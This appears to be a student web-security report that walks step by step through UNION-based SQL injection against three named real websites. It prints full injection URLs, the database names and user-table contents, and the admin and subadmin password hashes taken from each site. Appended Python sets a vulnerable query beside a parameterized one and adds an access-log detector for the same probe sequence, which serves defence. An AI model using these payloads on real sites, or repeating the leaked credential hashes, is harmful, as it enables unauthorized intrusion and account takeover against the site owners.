
21110098 – Võ Đăng Trình

Web security

1st website: mayinchuyennhiet.vn


[https://www.mayinchuyennhiet.vn/?php=product_detail&id=306]

1. Find a candidate SQL injection point


Judging by the link “?php=product_detail&id=306”, the numeric id parameter suggests that this website may be vulnerable to SQL injection.

2. Check the number of columns returned by the SQL query


Using HackBar v2, append “order by 27--” to the URL.

This is the website after applying that instruction.

3. Check for columns which can be exploited


From the above run, we can say that the previous 21 pages can be exploited. Apply “+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 --” to find out which page can be exploited.

As can be seen from the website, page 16 is the one that can be used to extract information from the database.

4. Check some database information


After spotting the page that can be used for data extraction, replace that page with a function such as version() (the database version), database() (the database name), or user() (the current database user).

version()

As can be seen from the image, the version of the database is 5.7.37

database()

The name of the database is mayinchuye_binh

user()

The user of this database is localhost

5. List tables in the database


To list all the names of the tables in the database, place “unhex(hex(group_concat(table_name)))” in the exploitable page and append “from information_schema.tables where table_schema=database()--”.

After using those instructions, all the table names of the database have been extracted through page 16. The table names are:
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_product_hot,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor

6. List columns of the user table


To view the columns of tbl_user (the sequence CHAR(116, 98, 108, 95, 117, 115, 101, 114) spells “tbl_user” in ASCII), apply
“https://www.mayinchuyennhiet.vn/?php=product_detail&id=-306 + UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(group_concat(column_name))),17,18,19,20,21,22,23,24,25,26 from information_schema.columns where table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114)--”

So the columns of tbl_user are id, uid, pwd, cat_id.

7. Get data in the tables


Retrieving data from a table requires the column names:
“https://www.mayinchuyennhiet.vn/?php=product_detail&id=-306 + UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(group_concat(id,0x02f,uid,0x02f,pwd,0x02f,cat_id))),17,18,19,20,21,22,23,24,25,26 from tbl_user--”

The data in the table tbl_user is:
“1/admincp/0a4f59342d128ab612449a75ba121dc0/Admincp,2/coder/ee12026a0b34f078925edcb4d85680c8/Subadmin”
Inside this table, there are 2 accounts:
+ User1: admincp, Password (as stored): 0a4f59342d128ab612449a75ba121dc0
+ User2: coder, Password (as stored): ee12026a0b34f078925edcb4d85680c8
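
The whole chain above works only because the id parameter is pasted into the SQL text, which is the same endpoint shape on all three sites in this report. As an added example that is not code from the report or from the sites it examines, the following Python builds that product_detail query two ways on a local SQLite database (a stand-in for MySQL): once by string concatenation, once with the value bound as a parameter plus an allow-list check. The schema, rows, hash strings and the tbl_product columns are constructed stand-ins modelled on the table and column names the report lists.

```python
"""Added example (not the report's or the sites' code): the query behind
'?php=product_detail&id=...' built by concatenation and by parameter binding,
run on a constructed SQLite database so the difference is visible offline."""
import sqlite3


def make_db():
    # Constructed stand-in data; tbl_product columns are assumed, tbl_user
    # columns (id, uid, pwd, cat_id) follow the report. Hashes are placeholders.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE tbl_product (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        CREATE TABLE tbl_user (id INTEGER PRIMARY KEY, uid TEXT, pwd TEXT, cat_id TEXT);
        INSERT INTO tbl_product VALUES (306, 'sample printer', 100);
        INSERT INTO tbl_user VALUES (1, 'admincp', '<placeholder-hash-1>', 'Admincp');
        INSERT INTO tbl_user VALUES (2, 'coder', '<placeholder-hash-2>', 'Subadmin');
    """)
    return con


# Same shape as the report's step 7: a negative id so the original SELECT
# matches nothing, a UNION with a matching column count, and a trailing
# comment that removes whatever the application appends after the id.
# Written for the three-column SQLite stand-in rather than the 27-column site.
UNION_PAYLOAD = "-306 UNION SELECT id, uid, pwd FROM tbl_user--"


def product_detail_vulnerable(con, raw_id):
    """The defect the report exploits: the request parameter becomes SQL text,
    so a UNION in it is parsed and executed, and '--' drops the trailing clause."""
    sql = "SELECT id, name, price FROM tbl_product WHERE id=" + raw_id + " AND price > 0"
    return con.execute(sql).fetchall()


def product_detail_parameterized(con, raw_id):
    """Same query with the value bound as a parameter: whatever the string
    contains is compared with id as one value and is never parsed as SQL."""
    sql = "SELECT id, name, price FROM tbl_product WHERE id=? AND price > 0"
    return con.execute(sql, (raw_id,)).fetchall()


def is_valid_product_id(raw_id):
    """Allow-list check for the parameter: a plain positive integer, nothing else."""
    return raw_id.isdigit() and int(raw_id) > 0


def product_detail_hardened(con, raw_id):
    """Validate first, then bind. Returns None for a rejected request so the
    caller can answer 400 without running any query at all."""
    if not is_valid_product_id(raw_id):
        return None
    return product_detail_parameterized(con, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:  ", product_detail_vulnerable(db, "306"))
    print("vulnerable, payload:    ", product_detail_vulnerable(db, UNION_PAYLOAD))
    print("parameterized, payload: ", product_detail_parameterized(db, UNION_PAYLOAD))
    print("hardened, payload:      ", product_detail_hardened(db, UNION_PAYLOAD))
```

Binding the parameter alone is enough to make the UNION inert (the payload string simply matches no id); the allow-list check on top of it is what lets the application refuse the request outright and log it instead of silently returning an empty page.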

2nd website: vietfarmsfsf.com
[http://www.vietfarmsfsf.com/?php=product_detail&id=260]

1. Find a candidate SQL injection point


Judging by the link “?php=product_detail&id=260”, the numeric id parameter suggests that this website may be vulnerable to SQL injection.

2. Check the number of columns returned by the SQL query


Using HackBar v2, append “order by 19--” to the URL.

This is the website after applying that instruction.

3. Check for columns which can be exploited


From the above run, we can say that the previous 19 pages can be exploited. Apply “+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --” to find out which page can be exploited.

As can be seen from the website, page 8 is the one that can be used to extract information from the database.

4. Check some database information


After spotting the page that can be used for data extraction, replace that page with a function such as version() (the database version), database() (the database name), or user() (the current database user).

version()

As can be seen from the image, the version of the database is 5.0.67-community

database()

The name of the database is traiviets_demo

user()

The user of this database is localhost

5. List tables in the database


To list all the names of the tables in the database, place “unhex(hex(group_concat(table_name)))” in the exploitable page and append “from information_schema.tables where table_schema=database()--”.

After using those instructions, all the table names of the database have been extracted through page 8. The table names are:
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor

6. List columns of the user table


To view the columns of tbl_user (the sequence CHAR(116, 98, 108, 95, 117, 115, 101, 114) spells “tbl_user” in ASCII), apply
“http://www.vietfarmsfsf.com/?php=product_detail&id=-260 + UNION SELECT 1,2,3,4,5,6,7,unhex(hex(group_concat(column_name))),9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114)--”

So the columns of tbl_user are id, uid, pwd.

7. Get data in the tables


Retrieving data from a table requires the column names:
“http://www.vietfarmsfsf.com/?php=product_detail&id=-260 + UNION SELECT 1,2,3,4,5,6,7,unhex(hex(group_concat(id,0x02f,uid,0x02f,pwd))),9,10,11,12,13,14,15,16,17,18 from tbl_user --”

The data in the table tbl_user is:
1/admincp/31b5d7b1a473763500b9b0d66e1a63c2,2/coder/ee12026a0b34f078925edcb4d85680c8
Inside this table, there are 2 accounts:
+ User1: admincp, Password (as stored): 31b5d7b1a473763500b9b0d66e1a63c2
+ User2: coder, Password (as stored): ee12026a0b34f078925edcb4d85680c8

3rd website: thepdaitayduong.com.vn
[http://thepdaitayduong.com.vn/?php=product_detail&id=220]

1. Find a candidate SQL injection point


Judging by the link “?php=product_detail&id=220”, the numeric id parameter suggests that this website may be vulnerable to SQL injection.

2. Check the number of columns returned by the SQL query


Using HackBar v2, append “order by 19--” to the URL.

This is the website after applying that instruction.

3. Check for columns which can be exploited


From the above run, we can say that the previous 19 pages can be exploited. Apply “+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --” to find out which page can be exploited.

As can be seen from the website, page 6 is the one that can be used to extract information from the database.

4. Check some database information


After spotting the page that can be used for data extraction, replace that page with a function such as version() (the database version), database() (the database name), or user() (the current database user).

version()

As can be seen from the image, the version of the database is 5.7.37

database()

The name of the database is thepdaitay_binh

user()

The user of this database is localhost

5. List tables in the database


To list all the names of the tables in the database, place “unhex(hex(group_concat(table_name)))” in the exploitable page and append “from information_schema.tables where table_schema=database()--”.

After using those instructions, all the table names of the database have been extracted through page 6. The table names are:
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor

6. List columns of the user table


To view the columns of tbl_user (the sequence CHAR(116, 98, 108, 95, 117, 115, 101, 114) spells “tbl_user” in ASCII), apply
“http://thepdaitayduong.com.vn/?php=product_detail&id=-220 +UNION SELECT 1,2,3,4,5,unhex(hex(group_concat(column_name))),7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114)--”

So the columns of tbl_user are id, uid, pwd, cat_id.

7. Get data in the tables


Retrieving data from a table requires the column names:
“http://thepdaitayduong.com.vn/?php=product_detail&id=-220 +UNION SELECT 1,2,3,4,5,unhex(hex(group_concat(id,0x02f,uid,0x02f,pwd,0x02f,cat_id))),7,8,9,10,11,12,13,14,15,16,17,18 from tbl_user --”

The data in the table tbl_user is:
1/admincp/0a4f59342d128ab612449a75ba121dc0/Admincp,2/coder/ee12026a0b34f078925edcb4d85680c8/Subadmin
Inside this table, there are 2 accounts:
+ User1: admincp, Password (as stored): 0a4f59342d128ab612449a75ba121dc0
+ User2: coder, Password (as stored): ee12026a0b34f078925edcb4d85680c8
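
The same probe sequence is repeated on all three sites: ORDER BY column counting, a numbered UNION SELECT, enumeration of information_schema.tables and information_schema.columns, a CHAR()-encoded table name, and group_concat extraction. Every step leaves a request in the web server's access log, so the sequence is straightforward to detect after the fact. As an added example that is not part of the report, the following Python scans access-log lines for those stages and groups the hits by client address. The log lines are constructed in Apache combined format with documentation-range addresses, the stage names and the "UNION probe plus at least one more stage" threshold are my own choices, and the column lists in the sample lines are shortened.

```python
"""Added example (not part of the report): a log-side detector for the
ORDER BY / UNION SELECT / information_schema / CHAR() / group_concat probe
sequence, run over constructed Apache combined-format access log lines."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One (name, pattern) per stage of the sequence; patterns are applied to the
# URL-decoded query string, case-insensitively.
STAGES = [
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_probe",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum",  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("encoded_name", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.I)),
    ("data_extract", re.compile(r"\bgroup_concat\s*\(", re.I)),
]

# Apache combined format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client running the report's sequence against the
# product_detail endpoint, one ordinary client whose search term happens to
# contain the words "order by".
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2023:10:00:01 +0700] "GET /?php=product_detail&id=306 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:00:09 +0700] "GET /?php=product_detail&id=306%20order%20by%2027-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:00:31 +0700] "GET /?php=product_detail&id=-306+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- HTTP/1.1" 200 4880 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:01:02 +0700] "GET /?php=product_detail&id=-306+UNION+SELECT+1,2,3,unhex(hex(group_concat(table_name))),5+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5011 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:01:40 +0700] "GET /?php=product_detail&id=-306+UNION+SELECT+1,2,3,unhex(hex(group_concat(column_name))),5+from+information_schema.columns+where+table_name=CHAR(116,98,108,95,117,115,101,114)-- HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2023:10:02:13 +0700] "GET /?php=product_detail&id=120 HTTP/1.1" 200 5077 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2023:10:02:20 +0700] "GET /?php=search&q=order+by+price HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
"""


def decode_query(path):
    """Split off the query string and undo percent/plus encoding twice, so a
    double-encoded keyword ("%2B" -> "+" -> space) is not missed."""
    query = path.partition("?")[2]
    return unquote_plus(unquote_plus(query))


def classify(path):
    """Names of the stages whose pattern matches this request's query string."""
    query = decode_query(path)
    return [name for name, rx in STAGES if rx.search(query)]


def analyze(lines):
    """Map each client address to the sorted list of stages it has triggered.
    Addresses that triggered nothing are left out."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip it
        for stage in classify(m.group("path")):
            seen[m.group("ip")].add(stage)
    return {ip: sorted(stages) for ip, stages in seen.items()}


def suspicious_ips(lines):
    """Clients that sent a UNION probe and at least one other stage; a single
    'order by' hit alone is not reported because ordinary parameters can contain it."""
    return sorted(ip for ip, stages in analyze(lines).items()
                  if "union_probe" in stages and len(stages) >= 2)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, stages in analyze(lines).items():
        print(ip, stages)
    print("suspicious:", suspicious_ips(lines))
```

The patterns are deliberately loose about whitespace and case because the same payload can arrive as "%20", "+" or mixed-case keywords; decoding before matching is what keeps the five stages to five short expressions. Grouping by client address rather than alerting per line is what turns the report's step sequence into a single finding.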

